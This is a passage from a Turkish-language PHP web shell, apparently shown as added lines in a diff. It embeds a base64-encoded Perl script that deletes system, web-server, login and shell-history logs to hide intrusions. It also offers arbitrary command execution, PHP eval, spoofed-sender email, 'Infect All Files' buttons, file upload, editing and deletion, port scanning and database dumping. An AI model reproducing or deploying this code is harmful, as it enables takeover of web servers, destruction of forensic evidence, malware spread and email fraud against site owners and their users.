aW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdXNlXCIpeyAjSWYgc3VzZSB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXXN1c2UgU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZSA9IHVubGluayBAc3VzZTsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgaWYoJGUpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSBlbHNlIHsgcHJpbnQgXCJbLV1FcnJvclwiOyB9DQogICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcInNvbGFyaXNcIil7ICNJZiBzb2xhcmlzIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdc29sYXJpcyBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRmID0gdW5saW5rIEBzb2xhcmlzOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGYpIHtwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwibGFtcHBcIil7ICNJZiBsYW1wcCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxhbXBwIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGcgPSB1bmxpbmsgQGxhbXBwOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICBpZigkZykgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkgICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJyZWRoYXRcIil7ICNJZiByZWRoYXQgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11SZWQgSGF0IExpbnV4L01hYyBPUyBYIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGggPSB1bmxpbmsgQHJlZGhhdDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRoKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KICAgICAgIA0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcImxpbnV4XCIpeyAjSWYgbGludXggdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11MaW51eCBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRpID0gdW5saW5rIEBsaW51eDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJaWYoJGkpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7fSANCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCgkJfSAgICAgIA0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdW5vc1wiKXsgI0lmIHN1bm9zIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICBwcmludCBcIlsrXVN1bk9TIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgICRsID0gdW5saW5rIEBzdW5vczsNCiAgICAgICAgICAgICAgaWYoJGwpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9ICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgaWYoJG9zIGVxIFwiYWl4XCIpeyAjSWYgYWl4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICAgICBwcmludCBcIlsrXUFpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbSA9IHVubGluayBAYWl4Ow0KICAgICAgICAgICAgICBpZigkbSkgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgDQogICAgICAgICAgICAgIGlmKCRvcyBlcSBcImlyaXhcIil7ICNJZiBpcml4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0DQogICAgICAgICAgICAgIHByaW50IFwiWytdSXJpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbiA9IHVubGluayBAaXJpeDsgICANCiAgICAgICAgICAgICAgaWYoJG4pIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI01pc2MgTG9nIExvY2F0aW9ucyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICBAbWlzYyA9IChcIi9ldGMvaHR0cGQvbG9ncy9hY2Nlc3MubG9nXCIsIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZ1wiLFwiL2V0Yy9odHRwZC9sb2dzL2FjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yX2xvZ1wiLFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2FjY2Vzcy5sb2dcIixcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9hcGFjaGUvZXJyb3JfbG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLFwiL3Zhci9sb2cvYXBhY2hlL2Vycm9yLmxvZ1wiLFwiL3Zhci9sb2cvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9lcnJvcl9sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL3d3dy9sb2dzL2FjY2Vzcy5sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvd3d3L2xvZ3MvYWNjZXNzX2xvZ1wiKQ0KICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBPcGVuQlNEIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBvcGVuYnNkID0gKFwiL3Zhci93d3cvbG9nL2FjY2Vzc19sb2dcIiwgXCIvdmFyL3d3dy9sb2cvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRnJlZUJTRCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAZnJlZWJzZCA9IChcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvYWNjZXNzX2xvZ1wiLCBcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRGViaWFuIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBkZWJpYW4gPSAoXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLCBcIi92YXIvbG9nL2FwYWNoZS9lcnJvci5sb2dcIiwNCiAgICAgICBcIi92YXIvbG9nL2FwYWNoZS1zc2wvZXJyb3IubG9nXCIsIFwiL3Zhci9sb2cvYXBhY2hlLXNzbC9hY2Nlc3MubG9nXCIpDQogICAgICAgICAgIH0gICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VTRSBMaW51eCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAc3VzZSA9IChcIi92YXIvbG9nL2h0dHBkL2FjY2Vzc19sb2dcIiwgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBTb2xhcmlzIFN5c3RlbXMNCiAgIA0KICAgICAgeyAgIA0KICAgICAgIEBzb2xhcmlzID0gKFwiL3Zhci9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsIFwiL3Zhci9hcGFjaGUvbG9ncy9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMYW1wcCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAbGFtcHAgPSAoXCIvb3B0L2xhbXBwL2xvZ3MvZXJyb3JfbG9nXCIsIFwiL29wdC9sYW1wcC9sb2dzL2FjY2Vzc19sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBSZWQgSGF0LCBNYWMgT1MgWCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAcmVkaGF0ID0gKFwiL3Zhci9sb2cvaHR0cGQvYWNjZXNzX2xvZ1wiLCBcIi92YXIvbG9nL2h0dHBkL2Vycm9yX2xvZ1wiKQ0KICAgICAgICAgICB9DQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICNMb2dzIG9mIElyaXggU3lzdGVtcw0KICAgDQogICAgICB7DQogICAgICAgQGlyaXggPSAoXCIvdmFyL2FkbS9TWVNMT0dcIiwgXCIvdmFyL2FkbS9zdWxvZ1wiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL2xhc3Rsb2cvXCIsDQogICAgICAgICAgICBcIi91c3Ivc3Bvb2wvbHAvbG9nXCIsIFwiL3Zhci9hZG0vbHAvbHAtZXJyc1wiLCBcIi91c3IvbGliL2Nyb24vbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2xvZ2lubG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwgXCIvdmFyL2FkbS9kdG1wXCIsDQogICAgICAgICAgICBcIi92YXIvYWRtL2FjY3Qvc3VtL2xvZ2lubG9nXCIsIFwidmFyL2FkbS9YMG1zZ3NcIiwgXCIvdmFyL2FkbS9jcmFzaC92bWNvcmVcIiwNCiAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jhc2gvdW5peFwiKQ0KICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZyBzb2YgQWl4IFN5c3RlbXMNCiAgICAgIHsgICANCiAgICAgIEBhaXggPSAoXCIvdmFyL2FkbS9wYWNjdFwiLCBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS9kdG1wXCIsIFwiL3Zhci9hZG0vcWFjY3RcIiwgICANCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS9yYXMvZXJybG9nXCIsIFwiL3Zhci9hZG0vcmFzL2Jvb3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vY3Jvbi9sb2dcIiwgXCIvZXRjL3V0bXBcIiwgXCIvZXRjL3NlY3VyaXR5L2xhc3Rsb2dcIiwNCiAgICAgICAgICAgICAgIFwiL2V0Yy9zZWN1cml0eS9mYWlsZWRsb2dpblwiLCBcInVzci9zcG9vbC9tcXVldWUvc3lzbG9nXCIpICAgDQogICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VuT1MgU3lzdGVtcyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgQHN1bm9zID0gKFwiL3Zhci9hZG0vbWVzc2FnZXNcIiwgXCIvdmFyL2FkbS9hY3Vsb2dzXCIsIFwiL3Zhci9hZG0vYWN1bG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9hZG0vc3Vsb2dcIiwgXCIvdmFyL2FkbS92b2xkLmxvZ1wiLCBcIi92YXIvYWRtL3d0bXBcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvYWRtL2xvZy9hc3BwcC5sb2dcIiwgXCIvdmFyL2xvZy9zeXNsb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9QT1Bsb2dcIiwgXCIvdmFyL2xvZy9hdXRobG9nXCIsIFwiL3Zhci9hZG0vcGFjY3RcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xwL2xvZ3MvbHBzY2hlZFwiLCBcIi92YXIvbHAvbG9ncy9yZXF1ZXN0c1wiLA0KICAgICAgICAgICAgICBcIi92YXIvY3Jvbi9sb2dzXCIsIFwiL3Zhci9zYWYvX2xvZ1wiLCBcIi92YXIvc2FmL3BvcnQvbG9nXCIpDQogICAgICAgICB9ICAgICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMaW51eCBTeXN0ZW1zICAgICAgIA0KICAgICAgeyAgICAgDQogICAgICAgQGxpbnV4ID0gKFwiL3Zhci9sb2cvbGFzdGxvZ1wiLCBcIi92YXIvbG9nL3RlbG5ldGRcIiwgXCIvdmFyL3J1bi91dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvc2VjdXJlXCIsXCIvcm9vdC8ua3NoX2hpc3RvcnlcIiwgXCIvcm9vdC8uYmFzaF9oaXN0b3J5XCIsDQogICAgICAgICAgICAgICAgIFwiL3Jvb3QvLmJhc2hfbG9ndXRcIiwgXCIvdmFyL2xvZy93dG1wXCIsIFwiL2V0Yy93dG1wXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9ydW4vdXRtcFwiLCBcIi9ldGMvdXRtcFwiLCBcIi92YXIvbG9nXCIsIFwiL3Zhci9hZG1cIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2FwYWNoZS9sb2dcIiwgXCIvdmFyL2FwYWNoZS9sb2dzXCIsIFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9nc1wiLA0KICAgICAgICAgICAgICAgICBcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3NcIiwgXCIvdmFyL2xvZy9hY2N0XCIsIFwiL3Zhci9sb2cveGZlcmxvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL21lc3NhZ2VzL1wiLCBcIi92YXIvbG9nL3Byb2Z0cGQveGZlcmxvZy5sZWdhY3lcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9wcm9mdHBkLnhmZXJsb2dcIiwgXCIvdmFyL2xvZy9wcm9mdHBkLmFjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIiwgXCIvdmFyL2xvZy9odHRwc2Qvc3NsX2xvZ1wiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL2h0dHBzZC9zc2wuYWNjZXNzX2xvZ1wiLCBcIi9ldGMvbWFpbC9hY2Nlc3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9xbWFpbFwiLCBcIi92YXIvbG9nL3NtdHBkXCIsIFwiL3Zhci9sb2cvc2FtYmFcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9zYW1iYS5sb2cuJW1cIiwgXCIvdmFyL2xvY2svc2FtYmFcIiwgXCIvcm9vdC8uWGF1dGhvcml0eVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL3BvcGxvZ1wiLCBcIi92YXIvbG9nL25ld3MuYWxsXCIsIFwiL3Zhci9sb2cvc3Bvb2xlclwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3NcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuYWxsXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmV3cy9uZXdzLmNyaXRcIiwgXCIvdmFyL2xvZy9uZXdzL25ld3MuZXJyXCIsIFwiL3Zhci9sb2cvbmV3cy9uZXdzLm5vdGljZVwiLA0KICAgICAgICAgICAgICAgICBcIi92YXIvbG9nL25ld3Mvc3Vjay5lcnJcIiwgXCIvdmFyL2xvZy9uZXdzL3N1Y2subm90aWNlXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9zcG9vbC90bXBcIiwgXCIvdmFyL3Nwb29sL2Vycm9yc1wiLCBcIi92YXIvc3Bvb2wvbG9nc1wiLCBcIi92YXIvc3Bvb2wvbG9ja3NcIiwNCiAgICAgICAgICAgICAgICAgXCIvdXNyL2xvY2FsL3d3dy9sb2dzL3RodHRwZF9sb2dcIiwgXCIvdmFyL2xvZy90aHR0cGRfbG9nXCIsDQogICAgICAgICAgICAgICAgIFwiL3Zhci9sb2cvbmNmdHBkL21pc2Nsb2cudHh0XCIsIFwiL3Zhci9sb2cvbmN0ZnBkLmVycnNcIiwNCiAgICAgICAgICAgICAgICAgXCIvdmFyL2xvZy9hdXRoXCIpDQogICAgICAgICB9DQogICAgICAgICANCiAgIA=="); +$openp = fopen("logseraser.pl", "w+")or die("Error"); +fwrite($openp, $erase)or die("Error"); +fclose($openp); +$aidx = passthru("perl logseraser.pl ".$_POST['functionp']); +unlink("logseraser.pl"); +echo "</textarea>"; +} + +if(isset($_POST['commex'])) +{ +echo "<tr><td> +<center><b><font size='2' face='Verdana'>CMD :]<br></font></b> + <input name=cmd size=20 type=text> + <select name=functionz> + <option>passthru</option> + <option>popen</option> + <option>exec</option> + <option>shell_exec</option> + <option>system</option> + </select><br><input type='submit' name='cmdex' value='Enter'></table>"; + } + if(isset($_POST['cmdex'])) + { echo "<tr><td>"; + switch (@$_POST['functionz']) { + case "system": + system(stripslashes($_POST['cmd'])); + + break; + case "popen": + $handle = popen($_POST['cmd'].' 2>&1', 'r'); + echo "'$handle'; " . gettype($handle) . "\n"; + $read = fread($handle, 2096); + echo $read; + pclose($handle); + + break; + case "shell_exec": + shell_exec(stripslashes($_POST['cmd'])); + + + break; + case "exec": + exec(stripslashes($_POST['cmd'])); + + break; + case "passthru": + passthru(stripslashes($_POST['cmd'])); + + } + } + +elseif(isset($_POST['mail'])) +{ +echo "<form method='post' action=''> +<td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onaylý]</font></center> +<center><font face='Verdana' size='1'>Kime:<br> +<input type='text' size='19' name='mto'><br> +Kimden:<br> +<input type='text' size='19' name='mfrom'><br> +Konu:<br> +<input type='text' size='19' name='mobj'><br> +Mesaj:<br> +<textarea name='mtext' cols=20 rows=4></textarea><br> +<br><input type='submit' value='Yolla' name='senm'> +</form></table><br>";} +if(isset($_POST['senm'])) +{ +//Mail With HTML <- webcheatsheet.com +$to = $_POST['mto']; +$subject = $_POST['mobj']; +$contentz = $_POST['mtext']."<!--"; +$random_hash = md5(date('r', time())); +$headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom']; +$headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\""; +ob_start(); +?> + +--PHP-alt-<?php echo $random_hash; ?> +Content-Type: text/html; charset="iso-8859-1" +Content-Transfer-Encoding: 7bit + +<? echo "$contentz"; ?> +--PHP-alt-<?php echo $random_hash; ?>-- +<? +$message = ob_get_clean(); + +$mail = @mail( $to, $subject, $message, $headers ); + +if($mail) { echo "<br><td valign=top> +<center><font color='green' size='1'>Mail Sent</font></center></table>"; } +else { echo "<br><td valign=top> +<center><font color='red' size='1'>Error</font></center></table>"; } +} + +elseif(isset($_POST['encoder'])) { +//Encoder +echo "<form method='post' action=''><td valign=top> +<center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>"; +} +if(isset($_POST['encode'])) { echo "<td valign=top> +<center><font face='Verdana' size='1'> +MD5:     <input type='text' size='35' value='".md5($_POST['encod'])."'><br> +Sha1:    <input type='text' size='35' value='".sha1($_POST['encod'])."'><br> +Crc32:    <input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br> +Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br> +Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";} + +//File List +echo "</table><table width=100%><tr><td> +<center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table> +<center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0> +<font size='1'> +<td valign=top><font face='Verdana' size='2'><b>Dosya Adý :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font> +</table></center>"; + +echo " +<br> +<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top> +<center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>"; +if(!isset($phpeval)) +{ +echo " + <form method='post' action=''> + <textarea name=php_eval cols=100 rows=5></textarea><br> + <input type='submit' value='Calistir!'> + </form> +"; +} + +if(isset($phpeval)) { +echo " +<form method='post' action=''> +<textarea name=php_eval cols=100 rows=10>"; +$wr = '"'; + $eval = @str_replace("<?","",$phpeval); + $eval = @str_replace("?>","",$phpeval); + @eval($eval); +echo "</textarea><br><input type='submit' value='Calistir!'></form>"; + +} +echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>"; +if(isset($textzz)) { echo $textzz; } +if(isset($textz0)) { echo $textz0; } +echo "</center></form></td></tr><tr><td> +<center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b> +<form method='post' action=''> +<input type='text' name='editfile' value=".$dir."> +<input type='submit' value='Go' name='doedit'> +</form>"; +// Edit Files n3xpl0rer +if(isset($_POST['doedit']) && $_POST['editfile'] != $dir) +{ +$file = $_POST['editfile']; +$content = file_get_contents($file); +echo "<form action='' method='post'><center> +<input type='hidden' name='editfile' value='".$file."'> +<textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>"; +} +if(isset($_POST['edit'])) { +$file = $_POST['editfile']; +echo $file."<br />"; +$fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>"); +fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>"); +fclose($fh); +echo "Done.</td></tr>"; +} +echo " +</table> +<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'> +<tr> +<td valign=top> +<center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b> +<form name='directory' method='post' action=''> +<input type='text' name='dir' value=$dir> +<input type='submit' value='Go'> +</form></td><td> +<center><b><font size='2' face='Verdana'> Port Tarayýcý <br></font></b> + <form name='scanner' method='post'> + <input type='text' name='host' value='127.0.0.1' > + <select name='protocol'> + <option value='tcp'>tcp</option> + <option value='udp'>udp</option> + </select> + <input type='submit' value='Portlarý TARA'> + </form> +"; +if(isset($host) && isset($proto)) +{ +echo "<font size='2' face='Verdana'>Open Ports:"; + +for($current = 0; $current <= 23; $current++) +{ +$currents = $myports[$current]; + +$service = getservbyport($currents, $proto); + + +// Try to connect to port +$result = fsockopen($host, $currents, $errno, $errstr, 1); + +// Show results +if($result) +{ +echo "$currents, "; +} + + +} +} + +echo "</font> +</td></tr> + +<tr> +<td valign=top width=50%> +<center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b> + <form method='post' action='' enctype='multipart/form-data'> + <input type='hidden' name='dare' value=$dir> + <input type='file' name='ffile'> + <input type='submit' name='ok' value='Upload!'> + </center> + </form> +</td> +<td valign=top> +<center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b> + <form method='post' action=''> + <input type='text' name='delete' value=$dir > <input type='submit' value='Dosyayý Sil' name='deletfilez'> + </center> + </form> +</td></tr> +<tr> +<td valign=top> + +<center><b><font size='2' face='Verdana'>Klasör Oluþtur<br></font></b> + <form method='post' action=''> + <input type='text' name='makedir' value=$dir> <input type='submit' value='Oluþtur'> + </center> + </form> +</td> +<td valign=top> +<center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b> + <form method='post' action=''> + <input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'> + </center> + </form> +</td></tr> +<tr> +<td valign=top width=50%> +<center><b><font size='2' face='Verdana'>Dosya Oluþtur:<br></font></b> + <form method='post' action=''> + <input type='hidden' name='darezz' value=$dir> + <font size='1' face='Verdana'>ADI:</font><br> + <input type='text' name='names' size='30'><br> + <font size='1' face='Verdana'>Kodu:</font><br> + <textarea rows='16' cols='30' name='source'></textarea><br> + <input type='submit' value='Upload'> + </center> + </form> +</td> +<td valign=top width=50%> +<center><b><font size='2' face='Verdana'>Database<br></font></b> + <form method='post' action=''> + <font size='1' face='Verdana'>Username: - Password:</font><br> + <input type='text' name='user' size='10'> + <input type='text' name='passd' size='10'><br> + <font size='1' face='Verdana'>Host:</font><br> + <input type='text' name='host' value='localhost'><br> + <font size='1' face='Verdana'>DB Name:</font><br> + <input type='text' name='db'><br> + <font size='1' face='Verdana'>Sorgu:</font><br> + <textarea rows='10' cols='30' name='query'></textarea><br> + <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'> + </center> + </form> +</td> </tr> + +</table> +</table> +<br /> +<table class='menu' 